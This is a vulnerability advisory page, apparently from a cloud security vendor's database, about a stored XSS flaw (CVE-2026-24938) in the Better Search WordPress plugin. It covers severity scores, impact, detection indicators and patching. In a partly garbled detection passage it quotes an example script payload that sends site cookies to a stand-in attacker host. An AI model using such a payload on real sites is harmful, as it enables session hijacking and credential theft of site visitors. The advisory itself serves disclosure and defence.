
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-24938 is a Stored Cross-Site Scripting (XSS) vulnerability in the Better Search WordPress plugin by Ajay (WebberZone). It affects all versions up to and including 4.2.1, and was disclosed on February 3, 2026, with the vulnerability originally reported by researcher Peter Thaleikis on October 23, 2025. The issue carries a CVSS v3.1 base score of 5.9 (Medium) (Patchstack).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), a Stored XSS flaw. An authenticated user with Author-level or higher privileges can inject malicious scripts through the plugin's web interface, which are then persistently stored and executed in victims' browsers when they visit affected pages. Exploitation requires high privileges and user interaction (a victim must visit or interact with the affected page), limiting the attack surface but not eliminating risk in multi-author WordPress environments (Patchstack).
Successful exploitation allows an attacker with Author-level or higher privileges to inject persistent malicious scripts into WordPress pages served to site visitors. This can result in session hijacking, credential theft, unauthorized redirects, or delivery of malicious payloads to end users. The confidentiality, integrity, and availability impacts are each rated Low, with a changed scope indicating that the impact extends beyond the plugin itself to affect site visitors' browsers (Patchstack).
The EPSS score for this vulnerability is approximately 0.033% (0.000330), indicating a low probability of exploitation in the wild in the near term. No public proof-of-concept exploit code, active in-the-wild exploitation, or threat actor attribution has been reported. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Patchstack notes that vulnerabilities of this class are sometimes used in mass-exploit campaigns targeting WordPress sites at scale (Patchstack).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>).<script> tags or obfuscated JavaScript.wp_options or wp_posts tables containing entries with embedded JavaScript or HTML event handlers (e.g., onerror, onload, <script>) associated with Better Search plugin settings.The vendor has released version 4.2.2 of the Better Search plugin, which patches this vulnerability. Site administrators should update to version 4.2.2 or later immediately via the WordPress plugin dashboard. Patchstack users can enable auto-update for vulnerable plugins as an additional safeguard. If immediate update is not possible, restricting Author-level and above account access, or temporarily deactivating the plugin, can reduce exposure (Patchstack).
The vulnerability was discovered and reported by security researcher Peter Thaleikis through Patchstack's Active Vulnerability Disclosure Program (VDP). Patchstack classified the issue as low priority with low likelihood of exploitation. No significant broader media coverage or notable community discussion has been identified beyond the Patchstack advisory (Patchstack).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."